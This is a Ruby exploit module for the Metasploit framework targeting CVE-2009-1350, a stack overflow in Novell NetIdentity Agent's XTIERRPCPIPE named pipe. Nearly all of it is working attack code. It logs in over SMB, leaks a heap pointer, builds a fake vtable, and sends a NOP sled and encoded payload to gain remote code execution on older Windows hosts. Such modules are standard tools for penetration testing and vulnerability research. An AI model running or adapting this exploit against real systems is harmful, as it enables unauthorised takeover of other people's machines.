1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::SMB::Client
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow',
16
        'Description' => %q{
17
          This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending
18
          a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be
19
          able to execute arbitrary code. The success of this module is much greater once the
20
          service has been restarted.
21
        },
22
        'Author' => [ 'MC', 'Ruben Santamarta' ],
23
        'License' => MSF_LICENSE,
24
        'References' => [
25
          [ 'CVE', '2009-1350' ],
26
          [ 'OSVDB', '53351' ],
27
          [ 'BID', '34400' ],
28
          [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1' ],
29
        ],
30
        'DefaultOptions' => {
31
          'EXITFUNC' => 'process', # only one shot!
32
        },
33
        'Payload' => {
34
          'Space'	=> 550,
35
          'BadChars' => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40",
36
          'StackAdjustment' => -3500,
37
          'PrependEncoder' => "\x81\xe4\xf0\xff\xff\xff",
38
        },
39
        'Platform'	=> 'win',
40
        'Targets' => [
41
          [ 'Windows 2000 / Windows XP / Windows 2003', { 'Ret' => 0x41414141 } ],
42
        ],
43
        'Privileged'	=> true,
44
        'DisclosureDate' => '2009-04-06',
45
        'DefaultTarget'	=> 0,
46
        'Notes' => {
47
          'Reliability' => UNKNOWN_RELIABILITY,
48
          'Stability' => UNKNOWN_STABILITY,
49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
50
        }
51
      )
52
    )
53

54
    register_options(
55
      [
56
        OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit'], fallbacks: ['USERNAME']),
57
        OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit'], fallbacks: ['PASSWORD'])
58
      ]
59
    )
60

61
    deregister_options('SMB::ProtocolVersion')
62
  end
63

64
  # don't bother with this module for autoexploitation, it creates
65
  # false-positives on newer systems.
66
  def autofilter
67
    false
68
  end
69

70
  def mem_leak
71
    print_status("Connecting to the server...")
72
    connect(versions: [1])
73

74
    print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
75

76
    begin
77
      smb_login()
78
    rescue ::Exception => e
79
      print_error("Error: #{e}")
80
      disconnect
81
      return
82
    end
83

84
    print_status("Connecting to named pipe \\XTIERRPCPIPE...")
85

86
    # If the pipe doesn't exist, bail.
87
    begin
88
      pipe = simple.create_pipe('\\XTIERRPCPIPE')
89
    rescue ::Exception => e
90
      print_error("Error: #{e}")
91
      disconnect
92
      return
93
    end
94

95
    # If we get this far, do the dance.
96
    fid = pipe.file_id
97

98
    # Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
99
    trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
100

101
    # Send the first request to get our pointer.
102
    leak = [0x00000004].pack('V') + [0x00000818].pack('V')
103
    leak << rand_text_alpha_upper(2040)
104

105
    print_status("Sending malformed request...")
106
    pipe.write(leak)
107

108
    heap_pointer_leaked = pipe.read()[2060, 4].unpack('V')[0]
109
    print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked))
110

111
    print_status("Building fake VTable...")
112
    object = heap_pointer_leaked + 0x700
113
    print_status(sprintf("Object: 0x%.8x", object))
114
    method = object + 0x30
115
    print_status(sprintf("Method: 0x%.8x", method))
116
    shellcode = method + 0xA0
117
    print_status(sprintf("Shellcode: 0x%.8x", shellcode))
118

119
    pipe.close
120

121
    return heap_pointer_leaked, object, method, shellcode
122
  end
123

124
  def exploit
125
    heap_pointer_leaked, object, method, shellcode = mem_leak()
126

127
    return if not shellcode
128

129
    sploit = [0x00000002].pack('V')
130
    sploit << [0x00000000].pack('V')
131
    sploit << [object].pack('V')
132
    sploit << [0x00000000].pack('V')
133
    sploit << rand_text_alpha_upper(240)
134
    sploit << [object].pack('V') * 32
135
    sploit << [method].pack('V') * 32
136
    sploit << [shellcode].pack('V') * 32
137
    sploit << make_nops(748)
138
    sploit << payload.encoded
139
    sploit << rand_text_alpha_upper(110)
140

141
    print_status("Connecting to the server...")
142
    connect(versions: [1])
143

144
    print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
145

146
    begin
147
      smb_login()
148
    rescue ::Exception => e
149
      print_error("Error: #{e}")
150
      disconnect
151
      return
152
    end
153

154
    print_status("Connecting to named pipe \\XTIERRPCPIPE...")
155

156
    # If the pipe doesn't exist, bail.
157
    begin
158
      pipe = simple.create_pipe('\\XTIERRPCPIPE')
159
    rescue ::Exception => e
160
      print_error("Error: #{e}")
161
      disconnect
162
      return
163
    end
164

165
    # ok, set up and send our exploit buffer...
166
    fid = pipe.file_id
167
    trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
168
    print_status("#{sploit.length} bytes written...")
169
    pipe.write(sploit)
170

171
    handler
172
    disconnect
173
  end
174
end
175

176